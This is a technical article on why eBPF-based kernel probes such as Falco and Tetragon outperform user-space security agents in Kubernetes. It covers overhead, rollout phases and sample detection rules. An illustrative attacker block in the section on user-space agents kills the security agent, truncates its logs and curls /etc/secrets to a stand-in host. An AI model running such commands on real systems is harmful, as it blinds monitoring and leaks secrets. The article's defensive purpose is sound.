Article: Kernel-Level Ground Truth: Why eBPF is Replacing User-Space Agents for Security Observability

User-space security agents are structurally flawed because they share the same privilege level as the processes they monitor, allowing attackers with root access to simply kill the agent or erase logs. It explains that eBPF solves this by attaching probes directly to the Linux kernel's syscall interface, providing visibility that a container-level attacker cannot disable. The piece also notes that replacing multiple user-space agents with a single eBPF-based solution can reduce security-related CPU consumption by 60-80% and that production-ready tools like Falco and Tetragon are available today.

Key Takeaways - Application-level logging depends on the cooperation of the process being monitored. A compromised process can kill its own watchdog, rewrite logs, or simply skip generating them. Your security visibility should not hinge on an attacker's willingness to be observed. - eBPF attaches probes directly to the Linux kernel's syscall interface, giving you visibility that persists even when an attacker has root inside a container. Disabling an eBPF probe requires escaping to the host kernel, which is a far harder problem than running kill -9 . - Replacing a stack of user-space security agents with a single eBPF-based agent can cut security-related CPU consumption by 60-80%, and the telemetry volume drops sharply because filtering happens in the kernel instead of in a SIEM you are paying per-GB for. - Roll out eBPF security in phases: observe first, alert second, enforce last. Skipping straight to enforcement is how you get paged at 3 AM because a detection rule killed your payment service. - Falco CNCF graduated and Tetragon Cilium sub-project are production-ready today. You do not need to write kernel code to get started. Introduction Last year I was looking into a post-mortem from an incident where a container breakout went completely undetected in a production Kubernetes cluster. The security team pulled up dashboards, scrolled through logs, and found nothing useful. Turns out the attacker had killed the logging sidecar as a first move. Everything that happened after that was invisible. The attack itself was not particularly clever. The monitoring stack just had a structural weakness baked in: the agent shared user space with the thing it was supposed to watch. Root in the container meant kill -9 on the agent, truncate on the log files, and then free rein. Fileless payloads via memfd create never touched the filesystem. Process injection hid behind trusted PIDs. The logging layer was the softest target in the whole setup. That write-up got me digging into eBPF seriously. Every process, malicious or not, has to cross the syscall boundary to open files, connect to the network, or spawn children. eBPF lets you instrument that boundary inside the kernel itself, where a container-level attacker simply cannot reach it. This article covers the architecture behind eBPF-based security monitoring, how to roll it out without breaking production, the cost story at scale, and which tools are worth your time right now. The Problem with User-Space Security Agents Living at the Same Privilege Level as the Threat Most Kubernetes security monitoring runs as sidecar containers or DaemonSets, basically user-space processes sitting alongside the workloads they watch. Figure 1: Traditional sidecar-based security monitoring. The agent shares the same privilege boundary as the workloads it monitors. Original diagram by the author This architecture has a fundamental issue: the security agent and the attacker operate at the same level. With root in the container, an attacker can: bash $ kill -9 $ pgrep security-agent $ truncate -s 0 /var/log/agent/ .log $ curl http://attacker.com/exfil -d @/etc/secrets No alert ever fires because the agent was dead before anything interesting happened. The CPU Tax User-space agents also impose real cost. To inspect network traffic they proxy connections through themselves, which means every packet crosses the user-kernel boundary multiple times. Add log serialization, parsing, and transmission on top, and it is easy to lose a meaningful slice of cluster CPU to security overhead alone. I have seen clusters where the monitoring stack consumed more resources than several of the services it was protecting. What Attackers Know Capable adversaries specifically target these gaps. memfd create lets code execute from memory without ever touching the filesystem, so file integrity monitors see nothing. Process injection hides behind trusted binaries the agent already ignores. Log evasion exploits the window between malicious activity and log shipment to delete evidence. The monitoring layer is the first thing a skilled attacker takes out, and the current architecture makes that easy. How eBPF Changes the Equation The Short Version eBPF lets you run sandboxed programs inside the Linux kernel without writing a kernel module. Originally a packet filtering mechanism hence "Berkeley Packet Filter" , the modern extended version is a general-purpose kernel instrumentation framework. Three things matter for security: - A built-in verifier statically analyzes every eBPF program at load time, proving it cannot crash the kernel, access unauthorized memory, or loop forever. If verification fails, the program never runs. Zero runtime cost, zero risk of a kernel panic. - eBPF programs execute in kernel context with direct access to kernel data structures. No user-kernel context switches, no proxy overhead. - You can attach probes to thousands of kernel functions, syscalls, network events, and tracepoints. The Verifier Deserves Its Own Paragraph Running custom code in the kernel makes people nervous, and with kernel modules that nervousness is justified. A buggy module can panic the machine. eBPF's verifier removes that failure mode entirely. It walks every possible execution path through the bytecode and checks termination guarantees, memory bounds, function call restrictions, and stack depth capped at 512 bytes . All statically, all before the program loads. The verifier is strict on purpose. It will reject programs that are actually safe but too complex for it to prove correct. Anyone who has worked with eBPF has hit this. You end up restructuring perfectly valid code just to satisfy the verifier. But that conservatism is why Meta, Google, and Netflix run eBPF in their production kernels at massive scale. Where the Probes Sit For security, eBPF programs attach at the syscall interface, the boundary every process must cross for privileged operations. Figure 2: eBPF probes sit at the syscall interface. Every process, including an attacker's, must cross this boundary. Original diagram by the author When any process calls connect , execve , or open , the probe captures the syscall arguments, process/thread IDs, container ID, Kubernetes pod metadata, user ID, capabilities, and the parent process chain. Because the probe runs in kernel context, an attacker with root inside a container would need to escape to the host kernel to tamper with it. That is a completely different class of problem compared to killing a user-space process. The Cost Story Organizations that have replaced a multi-agent user-space security stack with a single eBPF-based agent report CPU reductions of 60-80% on security workloads https://isovalent.com/blog/post/ebpf-security-observability/ . Figure 3: Overhead comparison between user-space security agents and eBPF kernel-level monitoring. Original diagram by the author There is a data volume angle too. User-space agents ship every log line, connection event, and file access to a centralized platform where most of it gets thrown away after ingestion. With eBPF the filtering happens in the kernel, so only events that actually matter leave the node. The SIEM ingestion cost reduction varies, but for most workloads it is substantial. Kernel Compatibility The features that matter for production security landed across kernels 4.15 through 5.7: Feature | Minimum Kernel | Description | | Basic tracing | 4.1 | kprobes, uprobes | | Syscall tracing | 4.6 | Tracepoint-based syscall monitoring | | Container awareness | 4.15 | cgroup-based filtering | | BTF type information | 5.2 | Portable eBPF programs | | bpf send signal | 5.3 | Process termination from eBPF | | LSM hooks | 5.7 | Security policy enforcement | Most production Kubernetes distributions ship with 5.4+, so kernel support is rarely a blocker. Worth checking your specific nodes, but I have not run into a kernel version problem on any reasonably current distribution. Rolling It Out Without Breaking Production Do not skip straight to enforcement. That path leads to false positives killing production processes and a very awkward post-mortem. Figure 4: Phased rollout: observe, alert, then enforce. Base progression on confidence, not calendar dates. Original diagram by the author Phase 1: Watch and Learn Deploy an eBPF agent Falco or Tetragon as a DaemonSet in passive mode. The agent observes all syscalls but blocks nothing. You need host-level access and kernel debug mounts: spec: hostPID: true hostNetwork: true containers: - name: agent image: falcosecurity/falco-no-driver:latest securityContext: privileged: true volumeMounts: - name: bpf-fs mountPath: /sys/fs/bpf - name: kernel-debug mountPath: /sys/kernel/debug readOnly: true Falco's Helm chart https://github.com/falcosecurity/charts handles the full DaemonSet config. For a first deployment, start there. During this phase, you are building baselines: which binaries each service runs, what network connections it establishes, what files it touches, what the normal process tree looks like. Stream events to cheap archival storage, not your real-time analytics platform. Move to the next phase once your baselines are stable across a few deployment cycles. Phase 2: Alert on Anomalies Now write detection rules against the baselines. This is behavioral detection, not signature matching. You are looking for deviations from what you know is normal. A Falco rule for unexpected process execution in a payment service: - rule: Unexpected Process in Payment Service desc: Detect execution of binaries not in the approved list condition: spawned process and container.name startswith "payment-" and not proc.name in java, jcmd, jstat output: Unexpected process executed in payment container user=%user.name container=%container.name process=%proc.name cmdline=%proc.cmdline parent=%proc.pname priority: WARNING tags: container, process, payment And one for metadata service access, which is almost always a sign of trouble: - rule: Container Accessing Cloud Metadata Service desc: Detect attempts to access instance metadata condition: outbound and fd.sip = "169.254.169.254" and container.id = host output: Container attempted metadata service access container=%container.name pod=%k8s.pod.name namespace=%k8s.ns.name dest=%fd.sip priority: CRITICAL tags: network, cloud, metadata Spend real time tuning during this phase. Review every alert, understand the false positives, suppress the known-good patterns. Move to enforcement only once the alert volume is manageable and you have validated rules against known attack scenarios. Phase 3: Enforce With high confidence in your detection rules, enable active blocking. Tetragon can use bpf send signal to SIGKILL a process before the offending syscall completes. Response time is measured in microseconds, not the minutes or hours of a traditional IR workflow. A typical enforcement scenario: a container calls connect to 169.254.169.254, the eBPF probe intercepts it, policy evaluation flags a violation, SIGKILL fires, the syscall never completes, and the alert goes out. The metadata service was never reached. This phase demands discipline. A false positive that kills a legitimate process is a production outage. The observation and alerting phases exist specifically to build enough confidence that enforcement does not become a liability. Tooling: Falco, Tetragon, and the Vendors Falco https://falco.org/ is where I would start for most teams. It is a CNCF graduated project with a big community, active development, and years of production mileage. It hooks into the syscall interface via eBPF and evaluates events against a YAML-based rule engine. The default ruleset maps to MITRE ATT&CK and covers reverse shells, container escapes, sensitive path access, and more. What I find most valuable about Falco is the Kubernetes context it attaches to events. The difference between "process X called connect to 169.254.169.254" and "the payment-api pod in prod namespace tried to reach the cloud metadata service" is the difference between fifteen minutes of cross-referencing and an immediately actionable alert. For active enforcement, where you need to kill a process before a malicious syscall completes, look at Tetragon https://tetragon.io/ . It is a Cilium sub-project and applies policy synchronously in the kernel. The trade-off is a smaller community and tighter coupling to the Cilium stack. Commercial vendors like Sysdig, Datadog, and Wiz have also rebuilt their agents on eBPF. If you already use one of them, check what eBPF capabilities you have before adding another tool. Securing the eBPF Deployment Itself eBPF programs run in the kernel with elevated privileges, so do not hand-wave the deployment security. Loading programs requires CAP BPF or CAP SYS ADMIN on kernels before 5.8 . Start with a privileged container if you must, then tighten to the minimum capabilities, usually CAP BPF , CAP PERFMON , and CAP SYS RESOURCE . Beyond that: - Lock down which service accounts can deploy elevated-capability containers - Use admission controllers OPA Gatekeeper, Kyverno to confine privileged workloads to the security namespace - Monitor that namespace for unauthorized changes - Pin agent images to verified digests, not mutable tags The verifier handles bytecode safety. Operational safety is on you. Conclusion Application-level logging is not going away. You still need it for debugging business logic and tracing requests through service meshes. But for security, where the adversary's first move is to disable your instrumentation, you need monitoring at a layer they cannot easily reach. eBPF gives you that. Syscall-level visibility that persists regardless of what the application does, instrumentation that lives in the kernel where container-level compromise cannot touch it, and overhead that is a fraction of what user-space agents impose. If you want to see it for yourself: deploy Falco on a staging cluster in observation-only mode. Spend thirty minutes looking at the events it captures. The gap between what your current monitoring shows and what eBPF reveals at the syscall level will make the case better than anything I can write here. And if you are already running eBPF-based security in production, share what you have learned. There is not nearly enough real-world operational knowledge circulating in this space.